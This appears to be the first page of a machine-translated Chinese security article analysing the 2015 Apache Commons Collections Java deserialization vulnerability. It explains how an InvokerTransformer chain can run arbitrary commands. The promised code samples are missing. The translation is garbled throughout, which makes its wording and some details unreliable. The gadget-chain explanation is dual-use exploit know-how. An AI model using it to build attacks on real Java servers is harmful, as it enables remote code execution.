Commons Collections the Java deserialization vulnerability in-depth analysis-vulnerability warning-the black bar safety net

ID MYHACK58:62201569493
Type myhack58
Reporter 深夜饮酒
Modified 2015-11-28T00:00:00


0x01 background

This year so far Java the greatest influence on vulnerability than this period of time lasts a fiery CommonsCollections deserialization vulnerability.

In 2 0 1 5 year 1 1 May 6, FoxGlove security team@breenmachine published a lengthy blog post, borrowed from Java deserialization, and the Apache Commons Collections that a Foundation Class Library for remote command execution in the real case came to the People's vision, the major Java Web Server have a Cheap Shot, this vulnerability swept WebLogic, WebSphere, JBoss, Jenkins, the OpenNMS to the latest version. While in the nearly 1 0 months ago, Gabriel Lawrence and Chris Frohoff has been in AppSecCali on a report mentioned in this exploit ideas.

Currently, for the“2 0 1 5 years the most undervalued”of the vulnerability, affected the Java application vendors have released a repaired version of the Apache Commons Collections project but also on the vulnerability exists in the Class Library for a certain amount of security processing.

0x02 from the Apache CommonsCollections speaking

Apache Commons Collections is an extension of the Java standard library Collection structure of the third-party Foundation library, which provides many powerful data structure type and to achieve a variety of collection tools. As the Apache open source project important component, Commons Collections is widely used in various Java application development.

Commons Collections to achieve a TransformedMap class, the class is of the Java standard data structure to Map the interface of an extension. The class can be in one element is added to the collection, automatically of the element specific modification transformation, specific transformation logic by the Transformer class is defined, the Transformer in the TransformedMap instantiated as an argument.

We can TransformedMap. decorate()method to get a TransformedMap instance. !

When TransformedMap within the key or value changes, it will trigger the corresponding Transformer's transform()method. In addition, you can also use a Transformer array configured to ChainedTransformer it. When triggered, ChainedTransformer can sequentially call a series of transformation. But Apache Commons Collections has built-in some commonly used of the Transformer, wherein the InvokerTransformer class is today the main character.

It's transform method as follows: !

This transform(Object input) use Java reflection mechanism to call the input object of a method, and the method name is instantiated InvokerTransformer class when the incoming iMethodName member variables:


That is this period of reflection code in the invoked method name and the Class object can be controlled. Thus, we can construct a malicious Transformer chain, to borrow InvokerTransformer. transform()perform any command, the test code is as follows:


The above code ConstantTransformer, as the name suggests can be converted to the object, becomes a constant, its transform()method code is as follows:


[1] [2] [3] [4] next